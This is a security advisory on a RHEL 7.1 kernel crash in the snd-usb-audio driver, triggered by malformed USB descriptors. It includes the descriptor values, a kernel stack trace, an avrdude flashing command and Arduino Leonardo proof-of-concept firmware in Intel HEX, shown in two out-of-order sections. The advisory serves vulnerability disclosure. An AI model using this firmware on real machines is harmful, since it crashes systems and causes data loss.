:1006F000F901EC5FFE4F04910023C9F0882321F03B
:1007000069830E94F5026981E02FF0E0EE0FFF1F80
:10071000E05DFE4FA591B4919FB7F8948C91611163
:1007200003C01095812301C0812B8C939FBF0F9034
:10073000DF91CF911F910F910895CF93DF93282FD1
:1007400030E0F901E853FF4F8491F901EA51FF4F7E
:10075000D491F901EC5FFE4FC491CC2391F081114B
:100760000E94F502EC2FF0E0EE0FFF1FEE5DFE4F52
:10077000A591B4912C912D2381E090E021F480E0AB
:1007800002C080E090E0DF91CF910895615030F099
:100790002091F100FC0120830196F8CF289884E68F
:1007A00080937D0508951092E900109271051092D2
:1007B000700590936F0580936E050895FF920F93D7
:1007C0001F93CF93DF93F82E8B01EA01BA01C80182
:1007D0000E94A406F80120E030E08EEF2C173D07C0
:1007E00091F1F7FE02C0A49101C0A0816091700553
:1007F0007091710540916E0550916F0564177507F2
:10080000ACF49091E8009570E1F39091E80092FDCE
:100810001CC0A093F100A0917005B09171051196D4
:10082000AF73BB27AB2B11F48093E800A091700548
:10083000B09171051196B0937105A09370052F5F6B
:100840003F4F3196CBCFC90102C08FEF9FEFDF91B1
:10085000CF911F910F91FF9008951F920F920FB6A5
:100860000F9211246F927F928F929F92AF92BF92BC
:10087000CF92DF92EF92FF920F931F932F933F93AC
:100880004F935F936F937F938F939F93AF93BF9398
:10089000EF93FF93CF93DF93CDB7DEB76297DEBFC1
:1008A000CDBF1092E9008091E80083FF46C168E067
:1008B000CE010A960E94C60382EF8093E8009A85D3
:1008C00097FF05C08091E80080FFFCCF03C08EEF4A
:1008D0008093E800892F807609F023C18B858111F0
:1008E00005C01092F1001092F10020C1282F2D7F39
:1008F000213009F41BC1853049F48091E80080FF64
:10090000FCCF8C8580688093E30010C1863009F0AD
:10091000E1C02D8508891989223009F0B3C0EC8423
:100920008E2D90E020917305309174058217930706
:100930000CF09FC00E94D3031F92EF928DE394E0CE
:100940009F938F930E9481068CE0E89E7001112492
:10095000E0917505F0917605EE0DFF1D89E0DE0151
:10096000119601900D928A95E1F7C8010E94D30378
:1009700049E050E0BE016F5F7F4F80E00E94DE03E0
:100980000F900F900F900F90C12CD12C612C712CD7
:1009900033E7A32E34E0B32E4AEA842E44E0942EAB
:1009A000E0917505F0917605EE0DFF1D818590E0D3
:1009B000681679060CF0BAC07F926F92BF92AF9220
:1009C0000E948106E0917505F0917605EE0DFF1D00
:1009D000628573856C0D7D1D49E050E080E00E94CA
:1009E000DE030F900F900F900F9000E010E0E09169
:1009F0007505F0917605EE0DFF1D0284F385E02D5F
:100A0000EC0DFD1D818590E0081719075CF51F931B
:100A10000F939F928F920E948106E0917505F0914D
:100A20007605EE0DFF1D0284F385E02DEC0DFD1D16
:100A3000C801880F991FA485B585A80FB91F4D91CE
:100A40005C910284F385E02DE80FF91F60817181CC
:100A500080E00E94DE030F5F1F4F0F900F900F90FA
:100A60000F90C5CF8FEF681A780A8EE0C80ED11CA0
:100A700097CF8FED94E09F938F930E9481060F9004
:100A80000F9058C0C8012A8B0E94D3032A892130B5
:100A9000C1F0233009F04EC08C851F928F9389EFEF
:100AA00094E09F938F930E94810642E050E062E8B9
:100AB00071E080E00E94DE030F900F900F900F9086
:100AC00035C04091000150E060E071E080E00E949C
:100AD000DE032CC0873071F1883021F481E08093EF
:100AE000F10024C0893011F5937021F5EDE4F1E0B7
:100AF00081E021E096E38093E9002093EB003491BC
:100B00003093EC009093ED008F5F3196843099F72D
:100B10008EE78093EA001092EA008C85809372053C
:100B200005C0888999890E94D30304C08EEF809301
:100B3000E80003C081E28093EB0062960FB6F89460
:100B4000DEBF0FBECDBFDF91CF91FF91EF91BF917F
:100B5000AF919F918F917F916F915F914F913F9155
:100B60002F911F910F91FF90EF90DF90CF90BF904A
:100B7000AF909F908F907F906F900F900FBE0F90CF
:100B80001F9018951F920F920FB60F9211248F93FA
:100B90009F938091E1001092E10083FF0FC01092BB
:100BA000E90091E09093EB001092EC0092E39093B7
:100BB000ED001092720598E09093F00082FF1AC049
:100BC00080917E05882339F080917E058150809345
:100BD0007E05882369F080917D05882359F08091F6
:100BE0007D05815080937D05811104C0289A02C043
:100BF0005D9AF1CF9F918F910F900FBE0F901F9034
:100C00001895CF93DF93CDB7DEB782E1FE0135961D
:100C1000A0E0B1E001900D928A95E1F78F89988D5F
:100C20009093760580937505898D9A8D90937405C0
:100C3000809373058B8D9C8D90937C0580937B05B1
:100C40008D8D9E8D90937A05809379058F8D98A1D7
:100C500090937805809377051092720581E08093D8
:100C6000D70080EA8093D80082E189BD09B400FEF4
:100C7000FDCF61E070E080E090E00E94790280E9C1
:100C80008093D8008CE08093E2001092E000559AA7
:100C9000209ADF91CF91089581E08093E00008953C
:100CA0009091C80095FFFCCF8093CE0008951092DC
:100CB000CD0087E68093CC0088E18093C9008EE068
:100CC0008093CA0008950F931F93CF93DF93EC0195
:100CD0008C01FE0101900020E9F73197EC1BFD0B20
:100CE000C8018C1B9D0B8E179F0730F4F801819172
:100CF0008F010E945006EDCFDF91CF911F910F9190
:100D00000895CF93DF93CDB7DEB7DA950FB6F89499
:100D1000DEBF0FBECDBFFE01EB5FFE4F4191519193
:100D20009F0160E071E0CE0101960E940507CE01AF
:100D300001960E946306D3950FB6F894DEBF0FBEEE
:100D4000CDBFDF91CF9108958F929F92AF92BF92C6
:100D5000CF92DF92EF92FF920F931F93CF93DF9387
:100D600000D0CDB7DEB75B0122E535E03F932F938E
:100D700089839A830E9481068981882E9A81992E7F
:100D80000F900F9000E010E08EE5E82E85E0F82E41
:100D900091E1C92E94E0D92E0A151B05E4F4F40163
:100DA00081914F0190E09F938F93FF92EF920E9469
:100DB00081060F5F1F4FC8018F7099270F900F900A
:100DC0000F900F90892B41F7DF92CF920E948106FE
:100DD0000F900F90E1CF81E194E09F938F930E9459
:100DE00081060F900F900F900F90DF91CF911F9180
:100DF0000F91FF90EF90DF90CF90BF90AF909F90BA
:100E00008F900895F8940C94E609AEE0B0E0EBE022
:100E1000F7E00C94BD098C01CA0146E04C831A83AB
:100E2000098377FF02C060E070E8615071097E833A
:100E30006D83A901BC01CE0101960E9431074D814D
:100E40005E8157FD0AC02F813885421753070CF485
:100E50009A01F801E20FF31F10822E96E4E00C9441
:100E6000D909ACE0B0E0E7E3F7E00C94AF097C010E
:100E70006B018A01FC0117821682838181FFBDC14B
:100E8000CE0101964C01F7019381F60193FD859106
:100E900093FF81916F01882309F4ABC1853239F446
:100EA00093FD859193FF81916F01853229F4B701FC
:100EB00090E00E941909E7CF512C312C20E020321C
:100EC000A0F48B3269F030F4803259F0833269F447
:100ED00020612CC08D3239F0803339F4216026C076
:100EE0002260246023C0286021C027FD27C030ED88
:100EF000380F3A3078F426FF06C0FAE05F9E300DD6
:100F00001124532E13C08AE0389E300D1124332E45
:100F100020620CC08E3221F426FD6BC1206406C015
:100F20008C3611F4206802C0883641F4F60193FD36
:100F3000859193FF81916F018111C1CF982F9F7D82
:100F40009554933028F40C5F1F4FFFE3F9830DC0D5
:100F5000833631F0833771F0833509F05BC022C0EE
:100F6000F801808189830E5F1F4F44244394512CE4
:100F7000540115C03801F2E06F0E711CF801A08019
:100F8000B18026FF03C0652D70E002C06FEF7FEFD8
:100F9000C5012C870E940E092C0183012C852F7717
:100FA000222E17C03801F2E06F0E711CF801A080EC
:100FB000B18026FF03C0652D70E002C06FEF7FEFA8
:100FC000C5012C870E9403092C012C852068222E44
:100FD000830123FC1BC0832D90E048165906B0F412
:100FE000B70180E290E00E9419093A94F4CFF5012C
:100FF00027FC859127FE81915F01B70190E00E9457
:10100000190931103A94F1E04F1A51084114510472
:1010100071F7E5C0843611F0893639F5F80127FFFC
:1010200007C060817181828193810C5F1F4F08C06E
:1010300060817181882777FD8095982F0E5F1F4F03
:101040002F76B22E97FF09C0909580957095619587
:101050007F4F8F4F9F4F2068B22E2AE030E0A401CF
:101060000E944B09A82EA81844C0853729F42F7E6A
:10107000B22E2AE030E025C0F22FF97FBF2E8F3646
:10108000C1F018F4883579F0B4C0803719F088378A
:1010900021F0AFC02F2F2061B22EB4FE0DC08B2DDA
:1010A0008460B82E09C024FF0AC09F2F9660B92E15
:1010B00006C028E030E005C020E130E002C020E1B9
:1010C00032E0F801B7FE07C06081718182819381AF
:1010D0000C5F1F4F06C06081718180E090E00E5F61
:1010E0001F4FA4010E944B09A82EA818FB2DFF77C3
:1010F000BF2EB6FE0BC02B2D2E7FA51450F4B4FED0
:101100000AC0B2FC08C02B2D2E7E05C07A2C2B2DD8
:1011100003C07A2C01C0752C24FF0DC0FE01EA0D1E
:10112000F11D8081803311F4297E09C022FF06C0A1
:101130007394739404C0822F867809F0739423FD0E
:1011400013C020FF06C05A2C731418F4530C571800
:10115000732C731468F4B70180E290E02C870E942E
:10116000190973942C85F5CF731410F4371801C046
:10117000312C24FF12C0B70180E390E02C870E943D
:1011800019092C8522FF17C021FF03C088E590E0D4
:1011900002C088E790E0B7010CC0822F867859F032
:1011A00021FD02C080E201C08BE227FD8DE2B70184
:1011B00090E00E941909A51438F4B70180E390E08B
:1011C0000E9419095A94F7CFAA94F401EA0DF11D6F
:1011D0008081B70190E00E941909A110F5CF33205A
:1011E00009F451CEB70180E290E00E9419093A94C7
:1011F000F6CFF7018681978102C08FEF9FEF2C9683
:10120000E2E10C94CB09FC010590615070400110A3
:10121000D8F7809590958E0F9F1F0895FC0161501F
:10122000704001900110D8F7809590958E0F9F1F08
:1012300008950F931F93CF93DF93182F092FEB017E
:101240008B8181FD03C08FEF9FEF20C082FF10C014
:101250004E815F812C813D81421753077CF4E881E8
:10126000F9819F012F5F3F4F39832883108306C088
:10127000E885F985812F0995892B29F72E813F81F2
:101280002F5F3F4F3F832E83812F902FDF91CF9190
:101290001F910F910895FA01AA27283051F12031AA
:1012A00081F1E8946F936E7F6E5F7F4F8F4F9F4FFA
:1012B000AF4FB1E03ED0B4E03CD0670F781F891F3C
:1012C0009A1FA11D680F791F8A1F911DA11D6A0F0A
:1012D000711D811D911DA11D20D009F468943F91BD
:1012E0002AE0269F11243019305D3193DEF6CF01BC
:1012F0000895462F4770405D4193B3E00FD0C9F782
:10130000F6CF462F4F70405D4A3318F0495D31FDEE
:101310004052419302D0A9F7EACFB4E0A695979541
:10132000879577956795BA95C9F700976105710517
:1013300008959B01AC010A2E069457954795379561
:101340002795BA95C9F7620F731F841F951FA01DBB
:101350000895EE0FFF1F0590F491E02D09942F9250
:101360003F924F925F926F927F928F929F92AF9235
:10137000BF92CF92DF92EF92FF920F931F93CF9382
:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19
:101390000FBECDBF09942A88398848885F846E843F
:1013A0007D848C849B84AA84B984C884DF80EE8089
:1013B000FD800C811B81AA81B981CE0FD11D0FB692
:1013C000F894DEBF0FBECDBFED010895F894FFCFB6
:1013D0001201000200000040AD0BEFBE000101024F
:1013E000000122034200610064002000420041002D
:1013F00042004500250078002500780025006E0099
:101400002500700018034200410044002000430002
:101410003000460046004500450021001201000250
:1014200000000040C007001500010102030109028D
:10143000270001010000FA0705810304040C0705D9
:10144000010204000C0705820104000C07000700DC
:101450000700480100500072006F006C00690066D0
:101460000069006300000A550000006BFD180A00C7
:10147000809F0AB901312B940A8101128946001319
:10148000000257028B0A5E0AF80A5F01F21201009D
:1014900002010000400D055702000101020301B9DD
:1014A0000A0100F80A5F0A810A220342006100640F
:1014B0000020004200410042004500250078002540
:1014C00000780025006E00250070001803420041DE
:1014D000004400200043003000460046004500451F
:1014E00000210012010002010000400D055702001A
:1014F000010102030109040000030100000003F2DE
:101500000AEC0A0902270001010000FA01AB0A09EE
:101510000400000301000000090200202020202018
:101520005F5F5F5F5F5F5F5F2020202020202020C3
:1015300020202020202020202020202020202020AB
:1015400020205F5F5F5F5F205F5F20205F202020A3
:101550002020205F5F0A0D00202020202F205F5FC9
:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7
:101570005F5F20205F5F5F5F5F20202020202F20A3
:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7
:10159000202F5F5F0A0D002020202F202F202020E9
:1015A0002F205F5F205C2F205F5F20602F205F5F18
:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E
:1015C000205C2F205F5F2F202F205F5F5F2F202F59
:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D
:1015E0002F202F202F202F5F2F202F202F5F2F2005
:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4
:101600002F202F5F2F202F202F5F5F2F202C3C0AB1
:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B
:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63
:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8
:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048
:101650003C3C2043485241534820414E59204F5072
:1016600045524154494E472053595354454D203E0D
:101670003E0A0D00203C3C202863292053657267F8
:10168000656A20536368756D696C6F20323031353F
:101690002C204F70656E536F7572636520536563C0
:1016A00075726974792052616C66205370656E6E34
:1016B0006562657267203E3E0A0D000A3E3E20507C
:1016C0007265737320627574746F6E20746F20730B
:1016D0007461727420657865637574696F6E2E2EFF
:1016E0002E0A0D005B44454255475D2045786563F1
:1016F000757465207061796C6F616420300A0D002B
:10170000526563762D446174613A0A0D005B44456D
:101710004255475D200953656E6420436F6E6669CC
:101720006775726174696F6E446573637269707412
:101730006F720928696E6465783A2569292E2E2E04
:101740000D0A005B44454255475D200953656E64B0
:1017500020496E74657266616365204465736372C7
:101760006970746F720928696E7465726661636569
:101770003A2569292E2E2E0D0A005B444542554715
:101780005D200953656E6420456E64706F696E74E8
:101790002044657363726970746F720928656E64A2
:1017A000706F696E743A2569292E2E2E0D0A005B22
:1017B00044454255475D203C3C70616E6963206D35
:1017C0006F64653F3E3E0D0A005B44454255475DF0
:1017D0002009203E3E20537472696E672044657371
:1017E00063726970746F72207265717565737420AD
:1017F0002D2073656E64696E67206D616C666F7213
:101800006D656420737472696E67212073657475E9
:10181000702E7756616C75654C203D3D2025690D15
:101820000A005B48455844554D505D0A0D0025306F
:04183000325820000A
:00000001FF
--
OS-S Security Advisory 2016-17
Linux snd-usb-audio Multiple Free
Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes (multiple
free) on invalid USB device descriptors (snd-usb-audio driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of advisory: https://os-s.net//advisories/OSS-2016-17_snd-usb-audio.pdf
Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB
device requiring the snd-usb-audio driver.
Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Kernel 3.10.0-327.10.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.
Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo
(github.com/schumilo) using the following device descriptor:
[*] Device-Descriptor
bLength: 0x12
bDescriptorType: 0x1
bcdUSB: 0x200
bDeviceClass: 0x3
bDeviceSubClass: 0x0
bDeviceProtocol: 0x0
bMaxPacketSize: 0x40
idVendor: 0x582
idProduct: 0x0
bcdDevice: 0x100
iManufacturer: 0x1
iProduct: 0x2
iSerialNumbers: 0x3
bNumConfigurations: 0x1
This is the configuration descriptor containing the malicious value for
bNumEndpoints causing the crash. A zero value for bNumEndpoints crashes the
system (multiple free).
[*] Configuration-Descriptor
bLength: 0x9
bDescriptorType: 0x2
wTotalLength: 0x27
bNumInterfaces: 0x1
bConfigurationValue: 0x1
iConfiguration: 0x0
bmAttributes: 0x0
bMaxPower: 0x31
[*] Interface-Descriptor
bLength: 0x9
bDescriptorType: 0x4
bInterfaceNumber: 0x0
bAlternateSetting: 0x0
bNumEndpoints: 0x3
bInterfaceClass: 0x0
bInterfaceSubClass: 0x0
bInterfaceProtocol: 0x0
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x81
bmAttribut: 0x3
wMaxPacketSize: 0x404
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x1
bmAttribut: 0x2
wMaxPacketSize: 0x4
bInterval: 0xc
[*] Endpoint-Descriptor:
bLength: 0x7
bDescriptorType: 0x5
bEndpointAddress: 0x82
bmAttribut: 0x1
wMaxPacketSize: 0x4
bInterval: 0xc
A Kernel Address Sanitizer (KASan) report is available at https://os-s.net/advisories/OSS-2016-17_KASan_Report.txt.
Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This
firmware will emulate the defective USB device.
avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U
flash:w:binary.hex
The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to
connect port D3 and 3V3!
Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware,
only physical access to the system is required.
Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
To this day, no security patch was provided by the vendor.
Since our 90-day Responsible Discourse deadline is expired, we publish this
Security Advisory.
References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283358
Kernel Stacktrace:
[ 32.951497] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 33.172627] usb 1-1: New USB device found, idVendor=0582, idProduct=0000
[ 33.179073] usb 1-1: New USB device strings: Mfr=1, Product=2,
SerialNumber=3
[ 33.186972] usb 1-1: Product: Ä?
[ 33.190732] usb 1-1: Manufacturer: Ä?
[ 33.195718] usb 1-1: SerialNumber: %
[ 33.206296] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc
says 96 microframes
[ 33.344127] BUG: unable to handle kernel NULL pointer dereference at
(null)
[ 33.345023] IP: [<ffffffffa041d063>] free_substream.part.0+0x53/0x70
[snd_usb_audio]
[ 33.345023] PGD 0
[ 33.345023] Oops: 0000 [#1] SMP
[ 33.345023] Modules linked in: snd_usb_audio(+) snd_usbmidi_lib snd_hwdep
snd_rawmidi snd_seq snd_seq_device snd_pcm snd_timer snd soundcore
ip6t_rpfilter ip6t_REJECT ipt_REJECT xt_conntrack ebtable_nat ebtable_broute
bridge stp llc ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6
nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw
ip6table_filter ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4
nf_nat_ipv4 nf_nat nf_conntrack iptable_mangle iptable_security iptable_raw
iptable_filter ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm
drm_kms_helper drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs
libcrc32c sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic
pata_acpi ata_piix libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 33.345023] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted
3.10.0-229.14.1.el7.x86_64 #1
[ 33.345023] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 33.345023] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
[ 33.345023] RIP: 0010:[<ffffffffa041d063>] [<ffffffffa041d063>]
free_substream.part.0+0x53/0x70 [snd_usb_audio]
[ 33.345023] RSP: 0018:ffff88000bd239b8 EFLAGS: 00010217
[ 33.345023] RAX: ffff88000c53c101 RBX: ffff88000c53c080 RCX: 00000000000067bd
[ 33.345023] RDX: 00000000000067bc RSI: ffffea00002f5400 RDI: ffff88000e401900
[ 33.345023] RBP: ffff88000bd239d8 R08: 0000000000016420 R09: ffff88000fc16420
[ 33.345023] R10: ffffea0000314f00 R11: ffffffffa041d060 R12: 0000000000000000
[ 33.345023] R13: ffff8800000588b8 R14: ffff880000058818 R15: 0000000000000000
[ 33.345023] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000)
knlGS:0000000000000000
[ 33.345023] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 33.345023] CR2: 0000000000000000 CR3: 000000000bd05000 CR4:
00000000000006f0
[ 33.345023] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[ 33.345023] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 33.345023] Stack:
[ 33.345023] ffff880000058800 ffff880000058600 0000000000000000 ffff88000c388a68
[ 33.345023] ffff88000bd239f0 ffffffffa041d319 ffffffffa03da0b8 ffff88000bd23a10
[ 33.345023] ffffffffa03c88b8 ffff88000f5c2a80 ffff88000c388980 ffff88000bd23a20
[ 33.345023] Call Trace:
[ 33.345023] [<ffffffffa041d319>] snd_usb_audio_pcm_free+0x69/0x70
[snd_usb_audio]
[ 33.345023] [<ffffffffa03c88b8>] snd_pcm_free+0x58/0x90 [snd_pcm]
[ 33.345023] [<ffffffffa03c8902>] snd_pcm_dev_free+0x12/0x20 [snd_pcm]
[ 33.345023] [<ffffffffa03a2ec9>] __snd_device_free+0x29/0x80 [snd]
[ 33.345023] [<ffffffffa03a319b>] snd_device_free_all+0x3b/0x50 [snd]
[ 33.345023] [<ffffffffa039c8ae>] release_card_device+0x1e/0x80 [snd]
[ 33.345023] [<ffffffff813cdde2>] device_release+0x32/0xa0
[ 33.345023] [<ffffffff812d6efe>] kobject_release+0x7e/0x1b0
[ 33.345023] [<ffffffff812d6db8>] kobject_put+0x28/0x60
[ 33.345023] [<ffffffff813ce107>] put_device+0x17/0x20
[ 33.345023] [<ffffffffa039cb09>] snd_card_free_when_closed+0x29/0x40 [snd]
[ 33.345023] [<ffffffffa039cc64>] snd_card_free+0x54/0x90 [snd]
[ 33.345023] [<ffffffffa041bf83>] ? create_composite_quirk+0x73/0xb0
[snd_usb_audio]
[ 33.345023] [<ffffffffa040e991>] usb_audio_probe+0x251/0x8d0 [snd_usb_audio]
[ 33.345023] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 33.345023] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 33.345023] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 33.345023] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 33.345023] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 33.345023] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 33.345023] [<ffffffff813d2680>] bus_add_driver+0x200/0x2d0
[ 33.345023] [<ffffffff813d3b34>] driver_register+0x64/0xf0
[ 33.345023] [<ffffffff8141c1c2>] usb_register_driver+0x82/0x160
[ 33.345023] [<ffffffffa0437000>] ? 0xffffffffa0436fff
[ 33.345023] [<ffffffffa043701e>] usb_audio_driver_init+0x1e/0x1000
[snd_usb_audio]
[ 33.345023] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 33.345023] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 33.345023] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 33.345023] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 33.345023] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 33.345023] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 33.345023] Code: 0d eb 2e 0f 1f 44 00 00 4c 89 e3 49 89 c4 48 8b 7b 48 e8
81 de d8 e0 48 8b 7b 58 e8 78 de d8 e0 48 89 df e8 70 de d8 e0 4d 39 ec <49>
8b 04 24 75 d7 49 8b be b8 00 00 00 e8 5b de d8 e0 5b 41 5c
[ 33.345023] RIP [<ffffffffa041d063>] free_substream.part.0+0x53/0x70
[snd_usb_audio]
[ 33.345023] RSP <ffff88000bd239b8>
[ 33.345023] CR2: 0000000000000000
[ 33.876830] ---[ end trace b239663354a1c556 ]---
[ 33.882175] Kernel panic - not syncing: Fatal exception
[ 33.883149] drm_kms_helper: panic occurred, switching back to text console
Arduino Leonardo Firmware:
:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C4050C942F04CA
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940E02C1
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C5000B030E0302
:1000B000010305032F032F032F03120316031A0353
:1000C000200324032F032A030000000200080E006F
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E4EDF3E102C005900D92A436B107D1
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9404070C940000089545
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B
:1001B00083E00E94300361E087E00E94300361E049
:1001C00088E00E9430030E9459067E012AE9E20E6F
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93D90188
:1002C0009C92F4E01196FC9311971496EC93F9012B
:1002D000DC01292D01900D922A95E1F7FE01EC56E3
:1002E000FF4FDC011B96FC93EE931A971D96BC9270
:1002F000AE921C971183008373836283558344837A
:100300000C5211092CE0F80111922A95E9F721E02D
:10031000D80119962C931997FE01E059FF4F0190CF
:100320000D929A94E1F7F8019387828761E088E063
:100330000E9469038BE492E00E94650688E892E0DF
:100340000E94650687EC92E00E94650686E093E0D5
:100350000E94650682E493E00E9465068FE793E0C1
:100360000E94650684EA93E00E9465068BEE93E0A6
:100370000E94650683E00E949F03892B09F047C015
:100380005E01F3E2AF0EB11C8824839482E1982EC3
:1003900084E194E00E946506BF92AF92DF92CF9213
:1003A000FF92EF921F928F921F930F932DB73EB73C
:1003B000225131090FB6F8943EBF0FBE2DBFADB725
:1003C000BEB71196FE01FB96892D01900D928A957C
:1003D000E1F78DE695E00E94030668E873E180E0AE
:1003E00090E00E947B028DE695E00E944E0660E060
:1003F00087E00E94690368E873E180E090E00E9472
:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E
:1004100070E080E090E00E947B02ACCF1F920F92D0
:100420000FB60F9211242F933F938F939F93AF9307
:10043000BF938091650590916605A0916705B09185
:1004400068053091640523E0230F2D3720F40196D1
:10045000A11DB11D05C026E8230F0296A11DB11DE7
:10046000209364058093650590936605A0936705C6
:10047000B09368058091690590916A05A0916B051C
:10048000B0916C050196A11DB11D809369059093F3
:100490006A05A0936B05B0936C05BF91AF919F91D6
:1004A0008F913F912F910F900FBE0F901F90189535
:1004B0003FB7F8948091690590916A05A0916B050A
:1004C000B0916C0526B5A89B05C02F3F19F0019689
:1004D000A11DB11D3FBF6627782F892F9A2F620F6C
:1004E000711D811D911D42E0660F771F881F991FA6
:1004F0004A95D1F70895CF92DF92EF92FF92CF9372
:10050000DF936B017C010E945802EB01C114D104FE
:10051000E104F10479F00E9458026C1B7D0B683EE7
:100520007340A0F381E0C81AD108E108F108C8516E
:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029
:100540000895789484B5826084BD84B5816084BD4B
:1005500085B5826085BD85B5816085BDEEE6F0E03C
:10056000808181608083E1E8F0E010828081826098
:100570008083808181608083E0E8F0E08081816019
:100580008083E1E9F0E08081826080838081816006
:100590008083E0E9F0E0808181608083E1ECF0E03D
:1005A000808184608083808182608083808181609B
:1005B0008083E3ECF0E0808181608083E0ECF0E018
:1005C000808182608083E2ECF0E0808181608083C2
:1005D000EAE7F0E0808184608083808182608083AC
:1005E000808181608083808180688083089590E02D
:1005F000FC013197EE30F10590F5EA5AFF4F0C946B
:10060000AB09809180008F7703C0809180008F7D3F
:1006100080938000089584B58F7702C084B58F7D64
:1006200084BD0895809190008F7707C080919000DD
:100630008F7D03C080919000877F80939000089504
:100640008091C0008F7703C08091C0008F7D809320
:10065000C00008958091C200877F8093C2000895F2
:10066000CF93DF9390E0FC01EA51FF4F2491FC010E
:10067000EC5FFE4F8491882349F190E0880F991F29
